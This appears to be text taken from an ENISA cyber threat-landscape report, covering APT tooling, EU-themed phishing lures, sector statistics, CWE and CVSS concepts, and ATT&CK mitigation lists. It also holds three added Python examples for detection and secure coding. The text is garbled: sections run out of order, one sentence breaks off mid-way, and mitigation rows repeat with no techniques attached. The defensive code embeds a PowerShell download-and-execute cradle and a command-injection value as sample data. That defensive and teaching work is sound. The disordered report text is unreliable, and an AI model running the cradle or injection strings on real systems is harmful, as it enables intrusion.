State-aligned intrusion sets continued updating and developing their toolsets to gain a foothold and to maintain stealthy, persistent access to targeted information systems. Key observations include:
• Physical-layer-adjacent access vectors (nearest-neighbour Wi-Fi and air-gap targeting): APT28's nearest neighbour Wi-Fi attack324 enabled network breaches from adjacent infrastructures without the operators being physically nearby, while GoldenJackal demonstrated infiltration of air-gapped systems via malicious USB drives.
• Network and infrastructure device exploitation: threat actors compromise core network devices by exploiting zero-day and n-day vulnerabilities, as in UNC3886's targeting of Juniper routers and Velvet Ant's exploitation of Cisco NX-OS zero-days.
• Continuous shifts in programming languages: re-implementation of existing toolsets in new languages to evade detection and improve portability. GoldenJackal transitioned from C# to Go, while APT35's Cyclops is a Go-based successor to BellaCiao.
• Anti-detection and evasion mechanisms: multiple toolsets incorporate sandbox detection, obfuscation or abuse of legitimate software to avoid security controls. Examples include SnipBot's anti-sandbox checks and Mustang Panda's abuse of Microsoft processes for injection.
• Expanded targeting of Linux systems: Linux systems, especially in infrastructure and cloud environments, are targeted by malware such as WolfsBane, FireWood and POOLRAT.
• In-memory malware deployment: adversaries increasingly execute payloads entirely in memory, as seen in BackdoorDiplomacy's QSC framework and APT29's GRAPELOADER.
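As an added example (not code from the ENISA report), the following Python script applies detection logic for two of the TTPs listed above, execution via PowerShell using encoded commands that stage a payload in memory, and credential brute-forcing, to a handful of constructed, already-parsed Windows Security events (4688 process creation and 4625 failed logon). The event layout, user names, source addresses, the download cradle and the threshold of five failed logons are all assumptions made for the example.

```python
import base64
import re
from collections import Counter

# Added example, not code from the ENISA report. Detection logic for two TTPs
# named in the report (PowerShell execution, here encoded commands that stage
# payloads in memory, and credential brute-forcing), run over constructed,
# already-parsed Windows Security events.


def _encode_ps(script: str) -> str:
    """powershell.exe -EncodedCommand expects Base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# A download cradle of the kind used for in-memory execution (constructed; the
# URL is a non-routable placeholder).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"

# Constructed sample events: 4688 = process creation, 4625 = failed logon.
SAMPLE_EVENTS = [
    {"id": 4688, "user": "alice", "cmd": r"C:\Windows\System32\notepad.exe report.txt"},
    {"id": 4688, "user": "bob", "cmd": "powershell.exe -nop -w hidden -enc " + _encode_ps(CRADLE)},
    {"id": 4688, "user": "svc_backup", "cmd": "powershell.exe -ExecutionPolicy Bypass -File backup.ps1"},
]
SAMPLE_EVENTS += [{"id": 4625, "user": "administrator", "src": "10.0.0.7"}] * 6
SAMPLE_EVENTS += [{"id": 4625, "user": "alice", "src": "10.0.0.9"}] * 2

# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe. The
# longest alternative is listed first, and the trailing \s+ stops "-e" from
# matching the start of unrelated switches such as -ExecutionPolicy.
_ENC_RE = re.compile(r"(?i)(?:^|\s)[-/](?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})")

# Markers of download-and-execute / in-memory tradecraft in a decoded script.
MARKERS = ("iex", "invoke-expression", "downloadstring", "downloaddata",
           "frombase64string", "reflection.assembly", "invoke-webrequest")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries an encoded command, else None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # switch present but payload is not a well-formed encoded command


def script_markers(script: str) -> list:
    low = script.lower()
    return [k for k in MARKERS if k in low]


def brute_force_sources(events, threshold: int = 5) -> dict:
    """Sources with at least `threshold` failed logons (4625) in the window."""
    fails = Counter(e["src"] for e in events if e["id"] == 4625)
    return {src: n for src, n in fails.items() if n >= threshold}


def analyse(events, threshold: int = 5) -> dict:
    hits = []
    for e in events:
        if e["id"] != 4688:
            continue
        script = decode_encoded_command(e["cmd"])
        if script is None:
            continue
        hits.append({
            "user": e["user"],
            "script": script,
            "markers": script_markers(script),
            "hidden_window": bool(re.search(r"(?i)-w(?:indowstyle)?\s+hidden", e["cmd"])),
        })
    return {"encoded_powershell": hits, "brute_force": brute_force_sources(events, threshold)}


if __name__ == "__main__":
    from pprint import pprint
    pprint(analyse(SAMPLE_EVENTS))
```

Decoding the Base64 rather than alerting on the `-enc` switch alone matters in practice: administrative tooling also uses encoded commands, so the decision should rest on what the decoded script does (download cradles, reflective loading) combined with context such as a hidden window, not on the encoding itself.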
7.2.2 EU as a target, and as a lure
Over the reporting period, multiple state-nexus intrusion sets continued leveraging tailored lures impersonating EU institutions, officials and affiliated entities. These campaigns capitalised on the perceived legitimacy of EU branding, official communication styles and references to policy-related events to increase the likelihood that recipients would engage with malicious content. This is notably illustrated by APT29 impersonating an EU MS Ministry of Foreign Affairs or referencing fictitious diplomatic events and cultural activities to target diplomatic staff in spearphishing campaigns, as well as mentioning ENISA in lure documents aimed at private companies. Similar examples include Callisto's tailored phishing pages mimicking EU institutional correspondence325, Storm-2372 masquerading as a member of the European Parliament's Committee on Foreign Affairs326, Laundry Bear's spearphishing campaign posing as organisers of the European Defence & Security Summit in Brussels327, and UTA0352 and UTA0355 impersonating officials from EU Member States such as Romania and Bulgaria, and Ukraine's diplomatic missions to the EU and NATO 328. Additional use of the EU brand was illustrated by Earth Preta, a subgroup of APT41, embedding malware in
With a total share of incidents amounting to 8.2%, the targeting of DIS in the EU shows a clear concentration on a few key intrusion sets, notably a stark dominance of operations linked to Russia-nexus intrusion sets, primarily APT29 121 and APT28. These intrusion sets account for the majority of observed incidents, with campaigns targeting IT service providers and telecommunications companies. DPRK-nexus malicious activity against this sector is largely driven by Famous Chollima's targeting of IT providers and software developers in the EU122 123, and by the DeceptiveDevelopment campaign targeting freelance software developers124 125. In contrast, activity associated with China-nexus intrusion sets, notably Salt Typhoon, appears less frequently but concentrates on telecommunications infrastructure through long-running, highly advanced campaigns, consistent with the broader global patterns of China-nexus cyberespionage126 127 128 129 130.
5.1 PUBLIC ADMINISTRATION
As in the previous ETL, public administration remains the most targeted sector (38%), showing a significant increase, primarily due to hacktivist-led DDoS attacks. The highest number of recorded incidents reportedly impacted the public administration sector in France (27%), Italy (26.3%) and Germany (16.2%), followed by Spain (15.3%) and Poland (15.1%). The distribution of incidents affecting public administration over the reporting period shows that incidents primarily impacted regional (24.4%) and central entities (15.1%).
Within the central entities category, defence and military related entities and intelligence and security services represented 2.4%, law enforcement related bodies made up 0.9% and political parties around 0.1%. Diplomatic missions such as embassies accounted for 1.4%. Union entities and NATO Enterprise each contributed 0.7% of all incidents. 1% of recorded DDoS attacks targeting the websites of organisations in the EU were related to non-EU countries, namely Iranian or Israeli organisations. Unsurprisingly, this threat picture is dominated by hacktivist-led DDoS attacks (96.2%), with public administration websites being the first choice of target around specific events, such as takedowns and arrests, electoral processes or high-visibility events107, as illustrated by a few contextualised examples hereunder.
Hacktivist groups NoName057(16) (66.7%), Dark Storm (20%), and Keymous+ (13.3%) were the most active intrusion sets targeting public administration in the EU. Alliances such as 7 October Union and Holy League contributed to the increasing tempo and intensity of DDoS attacks targeting the websites and portals of public administrations in EU MSs, in the context of Russia’s war of aggression against Ukraine, as well as the Israel-Hamas conflict. Other claims made by these alliances also pertained to societal issues, including EU migration policies, LGBTQ+ legislation, or perceived anti-religious stances.
5. SECTORIAL ANALYSIS
This section examines cyber threats from a sectorial perspective. While it includes the 18 sectors identified under the NIS2 Directive as high-criticality or other critical, our analysis extends beyond these to consider a broader range of sectors. Particular emphasis is placed on the five most targeted sectors to highlight key threat patterns. Over the reporting period, ENISA collected and curated 4 875 events. 28.5% of the total number of incidents were not associated with a specific sector, either because the sector was not properly documented (i.e., private sector, private companies) or not mentioned at all. Once this significant share is excluded, the top five targeted sectors in the EU are public administration (38.2%), transport (7.5%), digital infrastructure and services (4.8%), finance (4.5%) and manufacturing (2.9%). While recorded incidents include non-NIS2 sectors, the close alignment of the top five targeted sectors with sectors explicitly covered under the directive confirms the relevance of the NIS2 approach106, as essential entities represent 53.7% of the total number of recorded incidents.
While public administration, transport and finance were already listed as the top targeted sectors of EU MSs in the previous reporting period, incidents targeting public administration increased substantially, notably due to the increase in hacktivist-led DDoS attacks against this sector. Overall, DDoS attacks were the most prevalent threat (81.4%) and affected multiple sectors in the EU.
When considering the attack surface, 64% of documented vulnerabilities use the network as the attack vector, in accordance with the definition of the CVSS Attack Vector metric486. This underscores the risk of remote exploitation, especially for Internet-facing systems.
Based on the Common Weakness Enumeration (CWE) list, the following were the 25 most commonly seen hardware and software weakness types with potential security ramifications in 2024. Fig. 45, Top 25 commonly seen CWEs. Source: CWE list. Entries include: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'); Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'); Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'); Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection').
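As an added example (not code from the ENISA report), two of the CWE entries listed above, path traversal (CWE-22) and OS command injection (CWE-78), are shown below in Python in their vulnerable form beside a hardened form. The upload root `/srv/app/uploads`, the `ping` use case and the hostname allow-list are assumptions made for the example; the directory does not need to exist for the checks to run.

```python
import os
import shlex
import subprocess
from pathlib import Path

# Added example, not code from the ENISA report. CWE-22 (path traversal) and
# CWE-78 (OS command injection), each in a vulnerable and a hardened form.
# UPLOAD_ROOT is a hypothetical application directory.

UPLOAD_ROOT = Path("/srv/app/uploads")
HOST_CHARS = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.-")


def open_path_vulnerable(name: str) -> str:
    """CWE-22: user input is joined to the root with no containment check, so
    '../../etc/passwd' (or an absolute path) escapes the upload directory."""
    return os.path.normpath(os.path.join(str(UPLOAD_ROOT), name))


def resolve_path_hardened(name: str) -> Path:
    """Resolve '..' and symlinks first, then require the result to be the root
    itself or one of its descendants. A string prefix test is not enough:
    '/srv/app/uploads_old/x' starts with the root string but is outside it."""
    root = UPLOAD_ROOT.resolve(strict=False)
    candidate = (root / name).resolve(strict=False)  # an absolute `name` replaces root here
    if candidate != root and root not in candidate.parents:
        raise ValueError(f"path escapes upload root: {name!r}")
    return candidate


def ping_command_vulnerable(host: str) -> list:
    """CWE-78: the value is interpolated into a shell command line, so a host
    of '8.8.8.8; id' also runs `id`. The argv is returned instead of executed
    so the example stays runnable offline."""
    return ["/bin/sh", "-c", f"ping -c 1 {host}"]


def ping_command_hardened(host: str) -> list:
    """Allow-list the value and pass it as its own argv element with no shell,
    so metacharacters are never interpreted."""
    if not host or not set(host) <= HOST_CHARS:
        raise ValueError(f"invalid host: {host!r}")
    return ["ping", "-c", "1", host]


def ping_command_quoted(host: str) -> str:
    """If a shell really is unavoidable, shlex.quote neutralises metacharacters;
    the argv form above is still preferable."""
    return f"ping -c 1 {shlex.quote(host)}"


def run(argv: list) -> subprocess.CompletedProcess:
    """Execute an argv list without shell=True."""
    return subprocess.run(argv, capture_output=True, text=True, timeout=10, check=False)


if __name__ == "__main__":
    for probe in ("docs/report.pdf", "../../etc/passwd", "/etc/passwd", "/srv/app/uploads_old/x"):
        try:
            print("accepted:", resolve_path_hardened(probe))
        except ValueError as exc:
            print("rejected:", exc, "| the vulnerable version would open", open_path_vulnerable(probe))
    print(ping_command_vulnerable("8.8.8.8; id"))
    print(ping_command_quoted("8.8.8.8; id"))
```

The two hardened forms share one principle: validate after canonicalisation (the resolved path, the allow-listed host) and hand the value to the operating system through an interface that cannot reinterpret it (a contained path, a separate argv element).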
MITRE ATT&CK Mobile TTPs identified for RATs reportedly seen in the EU (table columns: Tactic, Technique, Mitigation). Mitigations referenced in the table rows: M1006: Use Recent OS Version; M1011: User Guidance; M1012: Enterprise Policy; M1013: Application Developer Guidance; M1017: User Training; M1018: User Account Management; M1021: Restrict Web-Based Content; M1022: Restrict File and Directory Permissions; M1026: Privileged Account Management; M1031: Network Intrusion Prevention; M1040: Behaviour Prevention on Endpoint; M1047: Audit; M1049: Antivirus/Antimalware; M1054: Software Configuration.
Concepts and frameworks used to document vulnerabilities:
CVE Numbering Authority493: an authorised entity with a specific scope and responsibility to regularly assign CVE IDs and publish the corresponding CVE Records. ENISA is a CVE Numbering Authority.
CVE Identifier: the CVE494 (Common Vulnerabilities and Exposures) programme is an international, community-driven effort to identify and catalogue publicly disclosed vulnerabilities. Each disclosed vulnerability is catalogued in a CVE Record, which includes information about the vulnerability and is assigned an alphanumeric string identifying it, the CVE Identifier (ID). Individual CVE Records are catalogued in the CVE List.
EUVD Identifier: similarly to CVE, ENISA assigns and records a unique identifier for each publicly disclosed vulnerability catalogued in the EU Vulnerability Database (EUVD).
CVSS: the Common Vulnerability Scoring System495 is an open framework for communicating the characteristics and severity of vulnerabilities. In the current version (4.0), metrics are organised in four groups (Base, Threat, Environmental and Supplemental) and combined into a single score between 0.0 and 10.0. CVSS adopts the following severity rating based on the score: None (0.0), Low (0.1-3.9), Medium (4.0-6.9), High (7.0-8.9) and Critical (9.0-10.0).
CWE: the Common Weakness Enumeration496 is a community-developed list of common software and hardware weakness types that could have security ramifications. A weakness is a condition in a software, firmware, hardware or service component that, under certain circumstances, could contribute to the introduction of vulnerabilities. Each CWE is assigned an ID. In many cases, a CWE ID is included in a vulnerability description to enrich the information. This helps developers to understand common weaknesses and improve secure development practices.
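As an added example (not code from the ENISA report), the following Python module parses CVSS v4.0 vector strings to reproduce the two measurements the text relies on: the share of vulnerabilities whose Attack Vector is Network (AV:N) and the qualitative severity band of a score. The scores are taken as published alongside each vector; the v4.0 scoring formula itself is not reproduced. The labels, vectors and scores in `SAMPLE_RECORDS` are constructed for the example and are not real CVE data.

```python
import re

# Added example, not code from the ENISA report. Parses CVSS v4.0 vector
# strings, validates the Base metrics, classifies published scores into the
# v4.0 qualitative severity bands and computes the share of network-reachable
# vulnerabilities. SAMPLE_RECORDS are constructed, not real CVE data.

# CVSS v4.0 Base metrics and their permitted values.
BASE_METRICS = {
    "AV": "NALP",  # Attack Vector: Network, Adjacent, Local, Physical
    "AC": "LH",    # Attack Complexity
    "AT": "NP",    # Attack Requirements
    "PR": "NLH",   # Privileges Required
    "UI": "NPA",   # User Interaction: None, Passive, Active
    "VC": "HLN", "VI": "HLN", "VA": "HLN",   # impact on the vulnerable system
    "SC": "HLN", "SI": "HLN", "SA": "HLN",   # impact on subsequent systems
}
_PAIR = re.compile(r"^([A-Z]{1,3}):([A-Za-z]+)$")


def parse_vector(vector: str) -> dict:
    """Return {metric: value} for a CVSS:4.0 vector. Optional Threat,
    Environmental and Supplemental metrics are kept but not validated."""
    parts = vector.split("/")
    if parts[0] != "CVSS:4.0":
        raise ValueError(f"not a CVSS v4.0 vector: {vector!r}")
    metrics = {}
    for part in parts[1:]:
        m = _PAIR.match(part)
        if not m:
            raise ValueError(f"malformed metric {part!r} in {vector!r}")
        metrics[m.group(1)] = m.group(2)
    for name, allowed in BASE_METRICS.items():
        value = metrics.get(name)
        if value is None or len(value) != 1 or value not in allowed:
            raise ValueError(f"missing or invalid base metric {name} in {vector!r}")
    return metrics


def severity(score: float) -> str:
    """CVSS v4.0 qualitative severity rating scale."""
    if not 0.0 <= score <= 10.0:
        raise ValueError(f"score out of range: {score}")
    if score == 0.0:
        return "None"
    if score < 4.0:
        return "Low"
    if score < 7.0:
        return "Medium"
    if score < 9.0:
        return "High"
    return "Critical"


def remotely_exploitable_unauthenticated(metrics: dict) -> bool:
    """Worst case for Internet-facing systems: reachable over the network with
    no privileges and no user interaction required."""
    return metrics["AV"] == "N" and metrics["PR"] == "N" and metrics["UI"] == "N"


SAMPLE_RECORDS = [  # (label, vector, published score); constructed sample data
    ("SAMPLE-1", "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N", 9.3),
    ("SAMPLE-2", "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N", 8.5),
    ("SAMPLE-3", "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N", 5.3),
    ("SAMPLE-4", "CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:A/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U", 1.0),
    ("SAMPLE-5", "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:N", 0.0),
]


def summarise(records) -> dict:
    """Share of AV:N vectors, count per severity band, and the labels that are
    network-reachable without authentication and rated High or Critical."""
    parsed = [(label, parse_vector(vec), score) for label, vec, score in records]
    network = sum(1 for _, m, _ in parsed if m["AV"] == "N")
    bands = {}
    for _, _, score in parsed:
        bands[severity(score)] = bands.get(severity(score), 0) + 1
    priority = [label for label, m, score in parsed
                if remotely_exploitable_unauthenticated(m) and severity(score) in ("High", "Critical")]
    return {"network_share": network / len(parsed), "bands": bands, "priority": priority}


if __name__ == "__main__":
    print(summarise(SAMPLE_RECORDS))
```

The `priority` list is the practical complement to the attack-surface figure: AV:N alone says the flaw is reachable over a network, but the combination with PR:N and UI:N is what distinguishes an unauthenticated, zero-click exposure on an Internet-facing system from a network-reachable flaw that still requires a foothold or a victim's action.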
MITRE ATT&CK Enterprise TTPs identified for ransomware reportedly seen in the EU (table columns: Tactic, Technique, Mitigation). Mitigations referenced in the table rows: M1015: Active Directory Configuration; M1017: User Training; M1018: User Account Management; M1025: Privileged Process Integrity; M1026: Privileged Account Management; M1027: Password Policies; M1028: Operating System Configuration; M1040: Behaviour Prevention on Endpoint; M1041: Encrypt Sensitive Information; M1043: Credential Access Protection.
MITRE ATT&CK Enterprise TTPs identified for loaders reportedly seen in the EU (table columns: Tactic, Technique, Mitigation). Mitigations referenced in the table rows: M1013: Application Developer Guidance; M1015: Active Directory Configuration; M1017: User Training; M1018: User Account Management; M1021: Restrict Web-Based Content; M1022: Restrict File and Directory Permissions; M1024: Restrict Registry Permissions; M1025: Privileged Process Integrity; M1026: Privileged Account Management; M1027: Password Policies; M1028: Operating System Configuration; M1029: Remote Data Storage; M1030: Network Segmentation; M1031: Network Intrusion Prevention; M1032: Multi-factor Authentication; M1033: Limit Software Installation; M1035: Limit Access to Resource Over Network; M1036: Account Use Policies; M1037: Filter Network Traffic; M1038: Execution Prevention; M1040: Behaviour Prevention on Endpoint; M1041: Encrypt Sensitive Information; M1042: Disable or Remove Feature or Program; M1043: Credential Access Protection; M1044: Restrict Library Loading; M1045: Code Signing; M1047: Audit; M1049: Antivirus/Antimalware; M1051: Update Software; M1052: User Account Control; M1054: Software Configuration.
MITRE ATT&CK Enterprise TTPs identified for RATs reportedly seen in the EU (table columns: Tactic, Technique, Mitigation).
Further entries of Fig. 45 (Top 25 commonly seen CWEs): Missing Authentication for Critical Function; Improper Control of Generation of Code ('Code Injection'); Improper Input Validation; Improper Neutralization of Special Elements used in a Command ('Command Injection'); Improper Restriction of Operations within the Bounds of a Memory Buffer.
The top 20 vendors whose solutions were reported as vulnerable accounted for 29% of all newly disclosed documented vulnerabilities over the reporting period, with top three vendors with the highest count of vulnerabilities disclosed as high and critical being Microsoft, Adobe, and Qualcomm Inc.
It should be noted that this distribution is likely to be inflated by CVE assignment policies, as is the case for Linux kernel-related vulnerabilities, where the kernel's CVE Numbering Authority assigns identifiers to a broad range of bug fixes487.
Table rows (Mitigation column): M1021: Restrict Web-Based Content; M1026: Privileged Account Management; M1033: Limit Software Installation; M1038: Execution Prevention; M1040: Behaviour Prevention on Endpoint; M1042: Disable or Remove Feature or Program; M1045: Code Signing; M1047: Audit; M1049: Antivirus/Antimalware.
OBSERVED TACTICS, TECHNIQUES & PROCEDURES (TTPS)
TTPs describe how adversaries operate: Tactics describe their objectives, Techniques document the general methods they use and Procedures detail the specific steps or tools they employ. Based on open-source reports, ENISA's dataset focuses heavily on post-compromise activities, particularly reconnaissance conducted by adversaries and the methods used to maintain access or execute malicious payloads after the initial intrusion. Documented tactics associated with TA0040: Impact, TA0010: Exfiltration and TA0009: Collection are less frequent. At the technique level, the dataset highlights the recurring tradecraft of adversaries around specific tactics. Figure 42 represents a clustered visualisation of common TTPs based on ENISA's dataset.
T1027: Obfuscated Files or Information
M1047: Audit, M1035: Limit Access to Resource Over Network, M1030: Network Segmentation, M1028: Operating System Configuration, M1042: Disable or Remove Feature or Program, M1018: User Account Management, M1032: Multi-factor Authentication, M1026: Privileged Account Management, M1027: Password Policies
M1042: Disable or Remove Feature or Program, M1032: Multi-factor Authentication, M1018: User Account Management, M1035: Limit Access to Resource Over Network, M1047: Audit, M1027: Password Policies
M1047: Audit, M1040: Behaviour Prevention on Endpoint, M1017: User Training, M1049: Antivirus/Antimalware
M1047: Audit, M1040: Behaviour Prevention on Endpoint, M1017: User Training, M1049: Antivirus/Antimalware
M1049: Antivirus/Antimalware, M1047: Audit, M1040: Behaviour Prevention on Endpoint, M1017: User Training
M1047: Audit, M1018: User Account Management, M1017: User Training, M1045: Code Signing, M1040: Behaviour Prevention on Endpoint, M1022: Restrict File and Directory Permissions, M1049: Antivirus/Antimalware, M1038: Execution Prevention
M1047: Audit, M1035: Limit Access to Resource Over Network, M1030: Network Segmentation, M1028: Operating System Configuration, M1042: Disable or Remove Feature or Program, M1018: User Account Management, M1032: Multi-factor Authentication, M1026: Privileged Account Management, M1027: Password Policies
M1026: Privileged Account Management, M1035: Limit Access to Resource Over Network, M1037: Filter Network Traffic, M1027: Password Policies, M1047: Audit, M1018: User Account Management, M1042: Disable
M1047: Audit, M1040: Behaviour Prevention on Endpoint, M1017: User Training, M1049: Antivirus/Antimalware
M1049: Antivirus/Antimalware, M1047: Audit, M1040: Behaviour Prevention on Endpoint, M1017: User Training
M1049: Antivirus/Antimalware, M1040: Behaviour Prevention on Endpoint, M1047: Audit, M1017: User Training
T1047: Windows Management Instrumentation
M1047: Audit, M1018: User Account Management, M1017: User Training, M1045: Code Signing, M1040: Behaviour Prevention on Endpoint, M1022: Restrict File and Directory Permissions, M1049: Antivirus/Antimalware, M1038: Execution Prevention
M1042: Disable or Remove Feature or Program, M1028: Operating System Configuration
M1022: Restrict File and Directory Permissions, M1038: Execution Prevention, M1045: Code Signing, M1047: Audit, M1018: User Account Management, M1017: User Training, M1040: Behaviour Prevention on Endpoint, M1049: Antivirus/Antimalware
M1042: Disable or Remove Feature or Program, M1031: Network Intrusion Prevention, M1030: Network Segmentation
M1026: Privileged Account Management, M1040: Behaviour Prevention on Endpoint, M1018: User Account Management, M1038: Execution Prevention
T1048.003: Exfiltration Over Unencrypted Non-C2 Protocol
M1022: Restrict File and Directory Permissions, M1038: Execution Prevention, M1045: Code Signing, M1047: Audit, M1018: User Account Management, M1017: User Training, M1040: Behaviour Prevention on Endpoint, M1049: Antivirus/Antimalware
M1042: Disable or Remove Feature or Program, M1031: Network Intrusion Prevention, M1030: Network Segmentation
M1026: Privileged Account Management, M1040: Behaviour Prevention on Endpoint, M1018: User Account Management, M1038: Execution Prevention
M1031: Network Intrusion Prevention, M1030: Network Segmentation, M1037: Filter Network Traffic, M1057: Data Loss Prevention, M1022: Restrict File and Directory Permissions, M1018: User Account Management
M1031: Network Intrusion Prevention, M1057: Data Loss Prevention, M1037: Filter Network Traffic, M1030: Network Segmentation, M1022: Restrict File and Directory Permissions, M1018: User Account Management
T1048: Exfiltration Over Alternative Protocol
M1030: Network Segmentation, M1057: Data Loss Prevention, M1037: Filter Network Traffic, M1031: Network Intrusion Prevention, M1022: Restrict File and Directory Permissions, M1018: User Account Management
M1042: Disable or Remove Feature or Program, M1034: Limit Hardware Installation, M1057: Data Loss Prevention
M1018: User Account Management, M1028: Operating System Configuration, M1022: Restrict File and Directory Permissions, M1026: Privileged Account Management, M1047: Audit
M1018: User Account Management, M1028: Operating System Configuration, M1022: Restrict File and Directory Permissions, M1026: Privileged Account Management, M1047: Audit
M1026: Privileged Account Management, M1018: User Account Management, M1047: Audit, M1028: Operating System Configuration, M1022: Restrict File and Directory Permissions
M1026: Privileged Account Management, M1018: User Account Management, M1047: Audit, M1028: Operating System Configuration, M1022: Restrict File and Directory Permissions
T1059: Command and Scripting Interpreter
M1033: Limit Software Installation, M1045: Code Signing, M1042: Disable or Remove Feature or Program, M1038: Execution Prevention, M1049: Antivirus/Antimalware, M1026: Privileged Account Management, M1047: Audit, M1021: Restrict Web-Based Content, M1040: Behaviour Prevention on Endpoint
M1042: Disable or Remove Feature or Program, M1049: Antivirus/Antimalware, M1045: Code Signing, M1026: Privileged Account Management, M1038: Execution Prevention, M1033: Limit Software Installation, M1047: Audit, M1021: Restrict Web-Based Content, M1040: Behaviour Prevention on Endpoint
M1038: Execution Prevention, M1033: Limit Software Installation, M1045: Code Signing, M1042: Disable or Remove Feature or Program, M1049: Antivirus/Antimalware, M1026: Privileged Account Management, M1047: Audit, M1021: Restrict Web-Based Content, M1040: Behaviour Prevention on Endpoint
M1042: Disable or Remove Feature or Program, M1049: Antivirus/Antimalware, M1038: Execution Prevention, M1040: Behaviour Prevention on Endpoint, M1021: Restrict Web-Based Content, M1033: Limit Software Installation, M1045: Code Signing, M1026: Privileged Account Management, M1047: Audit
T1190: Exploit Public-Facing Application
M1030: Network Segmentation, M1028: Operating System Configuration, M1032: Multi-factor Authentication, M1026: Privileged Account Management
M1050: Exploit Protection, M1051: Update Software, M1048: Application Isolation and Sandboxing, M1021: Restrict Web-Based Content, M1017: User Training
M1048: Application Isolation and Sandboxing, M1030: Network Segmentation, M1016: Vulnerability Scanning, M1026: Privileged Account Management, M1050: Exploit Protection, M1035: Limit Access to Resource Over Network, M1051: Update Software
M1038: Execution Prevention, M1042: Disable or Remove Feature or Program, M1050: Exploit Protection, M1037: Filter Network Traffic, M1026: Privileged Account Management, M1021: Restrict Web-Based Content
M1038: Execution Prevention, M1037: Filter Network Traffic, M1034: Limit Hardware Installation, M1031: Network Intrusion Prevention, M1042: Disable or Remove Feature or Program
M1018: User Account Management, M1036: Account Use Policies, M1032: Multi-factor Authentication, M1027: Password Policies
M1030: Network Segmentation, M1042: Disable or Remove Feature or Program, M1035: Limit Access to Resource Over Network, M1032: Multi-factor Authentication
M1017: User Training, M1038: Execution Prevention, M1040: Behaviour Prevention on Endpoint, M1021: Restrict Web-Based Content, M1031: Network Intrusion Prevention
M1031: Network Intrusion Prevention, M1017: User Training, M1021: Restrict Web-Based Content, M1038: Execution
M1048: Application Isolation and Sandboxing, M1030: Network Segmentation, M1016: Vulnerability Scanning, M1026: Privileged Account Management, M1050: Exploit Protection, M1035: Limit Access to Resource Over Network, M1051: Update Software
T1211: Exploitation for Defence Evasion
M1038: Execution Prevention, M1040: Behaviour Prevention on Endpoint, M1017: User Training, M1021: Restrict Web-Based Content, M1031: Network Intrusion Prevention
M1050: Exploit Protection, M1051: Update Software, M1019: Threat Intelligence Program, M1048: Application Isolation and Sandboxing
M1047: Audit, M1018: User Account Management, M1017: User Training, M1032: Multi-factor Authentication, M1060: Out-of-Band Communications Channel, M1054: Software Configuration, M1041: Encrypt Sensitive Information
M1042: Disable or Remove Feature or Program, M1026: Privileged Account Management, M1050: Exploit Protection, M1037: Filter Network Traffic, M1038: Execution Prevention, M1021: Restrict Web-Based Content
M1038: Execution Prevention, M1037: Filter Network Traffic, M1034: Limit Hardware Installation, M1031: Network Intrusion Prevention, M1042: Disable or Remove Feature or Program
T1537: Transfer Data to Cloud Account
M1030: Network Segmentation, M1018: User Account Management, M1060: Outof-Band Communications Channel, M1024: Restrict Registry Permissions, M1022: Restrict File and Directory Permissions
M1038: Execution Prevention, M1028: Operating System Configuration, M1018: User Account Management, M1053: Data Backup
M1057: Data Loss Prevention, M1018: User Account Management, M1054: Software Configuration, M1037: Filter Network Traffic
M1040: Behaviour Prevention on Endpoint, M1028: Operating System Configuration, M1047: Audit, M1045: Code Signing, M1018: User Account Management, M1033: Limit Software Installation, M1026: Privileged Account Management, M1054: Software Configuration, M1022: Restrict File and Directory Permissions
T1548.002: Bypass User Account Control
Mitigation Control, M1026: Privileged Account Management, M1018: User Account Management, M1047: Audit, M1022: Restrict File and Directory Permissions
M1051: Update Software, M1047: Audit, M1052: User Account Control, M1026: Privileged Account Management, M1038: Execution Prevention, M1028: Operating System Configuration, M1018: User Account Management, M1022: Restrict File and Directory Permissions
M1041: Encrypt Sensitive Information, M1051: Update Software, M1017: User Training, M1015: Active Directory Configuration, M1027: Password Policies, M1028: Operating System Configuration, M1037: Filter Network Traffic, M1022: Restrict File and Directory Permissions, M1035: Limit Access to Resource Over Network, M1047: Audit, M1026: Privileged Account Management
M1038: Execution Prevention, M1028: Operating System Configuration, M1026: Privileged Account Management, M1024: Restrict Registry Permissions, M1054: Software Configuration
T1548: Abuse Elevation Control Mechanism
M1030: Network Segmentation, M1018: User Account Management, M1060: Outof-Band Communications Channel, M1024: Restrict Registry Permissions, M1022: Restrict File and Directory Permissions
M1038: Execution Prevention, M1028: Operating System Configuration, M1018: User Account Management, M1053: Data Backup
M1040: Behaviour Prevention on Endpoint, M1028: Operating System Configuration, M1047: Audit, M1045: Code Signing, M1018: User Account Management, M1033: Limit Software Installation, M1026: Privileged Account Management, M1054: Software Configuration, M1022: Restrict File and Directory Permissions
M1038: Execution Prevention, M1028: Operating System Configuration, M1051: Update Software, M1052: User Account
T1555.003: Credentials from Web Browsers
M1038: Execution Prevention, M1028: Operating System Configuration, M1051: Update Software, M1052: User Account Control, M1026: Privileged Account Management, M1018: User Account Management, M1047: Audit, M1022: Restrict File and Directory Permissions
M1051: Update Software, M1047: Audit, M1052: User Account Control, M1026: Privileged Account Management, M1038: Execution Prevention, M1028: Operating System Configuration, M1018: User Account Management, M1022: Restrict File and Directory Permissions
